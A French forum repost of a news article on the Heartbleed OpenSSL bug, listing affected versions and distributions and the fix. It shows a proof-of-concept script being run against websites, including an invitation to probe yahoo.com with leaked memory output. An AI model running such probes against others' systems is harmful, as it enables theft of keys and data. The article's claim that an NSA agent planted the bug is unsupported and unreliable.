Jump to content
View in the app

A better way to browse. Learn more.
Forum Supreme-Elite

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Alerte générale : grosse faille de sécurité dans OpenSSL

supremesite
in Actu du Net

Featured Replies


/public/images/icons/heartbleed.png
Alerte générale : une nouvelle faille vient d'être découverte dans la librairie OpenSSL. Cet exploit, appelé aussi "The Heartbleed Bug", permet à n'importe qui sur Internet de lire la mémoire des systèmes utilisant une versions vulnérables d'OpenSSL (extraction de 64K de données par requête, voir plus dans certaines conditions).

Cette technique permet de voler les clés privées et d'espionner des communications, de voler des données... et ceci sans laisser aucune trace, le top. Pour corriger le problème, il suffit simplement de mettre à jour votre distribution et notamment le paquet OpenSSL. Toutes les détails techniques sont lisibles ici ou ici (en anglais).

Comment tester rapidement si mon site HTTPS est affecté par cette faille ?

Rien de plus simple, il suffit d'utiliser cet outil en ligne : filippo.io/Heartbleed/

Exemple pour Tux-planet : filippo.io/Heartbleed/#www.tux-planet.fr:443

/public/images/screenshots/sites/heartbleed/bug-openssl.png

Quelles sont les versions d'OpenSSL affectées ?

  • OpenSSL 1.0.1 jusqu'à la version 1.0.1f incluse sont vulnérables (traduction, les versions 1.0.1 abcdef sont concernées)
  • OpenSSL 1.0.1g n'est pas concernée
  • La branche OpenSSL 1.0.0 n'est pas concernée
  • La branche OpenSSL 0.9.8 n'est pas concernée

Le bug a été introduit dans OpenSSL en décembre 2011 par un agent infiltré de la NSA, de quoi avoir quelques frissons.

Quels sont les systèmes affectés par cette faille ?

Voici quelques exemples de distribution Linux vulnérables :

  • Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
  • Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
  • CentOS 6.5, OpenSSL 1.0.1e-15
  • Fedora 18, OpenSSL 1.0.1e-4
  • OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)
  • FreeBSD 8.4 (OpenSSL 1.0.1e) and 9.1 (OpenSSL 1.0.1c)
  • NetBSD 5.0.2 (OpenSSL 1.0.1e)
  • OpenSUSE 12.2 (OpenSSL 1.0.1c)

Les systèmes suivants ne sont pas vulnérable :

  • Debian Squeeze (oldstable), OpenSSL 0.9.8o-4squeeze14
  • SUSE Linux Enterprise Server

Un script Python pour jouer un peu avec la faille

Pour ceux qui veulent faire mumuse, un script Python est disponible ici. Voici un exemple d'utilisation sur un site non vulnérable :

$ wget

$ python ssltest.py www.tux-planet.fr

Connecting...

Sending Client Hello...

Waiting for Server Hello...

... received message: type = 22, ver = 0301, length = 81

... received message: type = 22, ver = 0301, length = 681

... received message: type = 22, ver = 0301, length = 397

... received message: type = 22, ver = 0301, length = 4

Sending heartbeat request...

... received message: type = 21, ver = 0302, length = 2

Received alert:

0000: 02 46                                            .F

Server returned error, likely not vulnerable

Et sur un site vulnérable, la mémoire du processus est dumpé et retourné à l'attaquant :

/public/images/screenshots/sites/heartbleed/hearbleed-poc.png

Edit : si vous voulez jouer, le site yahoo.com est encore vulnérable :

$ python ssltest.py yahoo.com

Connecting...

Sending Client Hello...

Waiting for Server Hello...

... received message: type = 22, ver = 0302, length = 66

... received message: type = 22, ver = 0302, length = 4735

... received message: type = 22, ver = 0302, length = 331

... received message: type = 22, ver = 0302, length = 4

Sending heartbeat request...

... received message: type = 24, ver = 0302, length = 16384

Received heartbeat response:

0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  [email protected][...r...

0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......

0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".

0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.

0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................

0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.

0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...

0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............

0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................

0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.


Alerte générale : grosse faille de sécurité dans OpenSSL est un article original provenant de Tux-planet

Voir l'article complet
https://forum.supreme-elite.fr/topic/15921-alerte-g%C3%A3%C2%A9n%C3%A3%C2%A9rale-grosse-faille-de-s%C3%A3%C2%A9curit%C3%A3%C2%A9-dans-openssl/
Go to topic listing

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.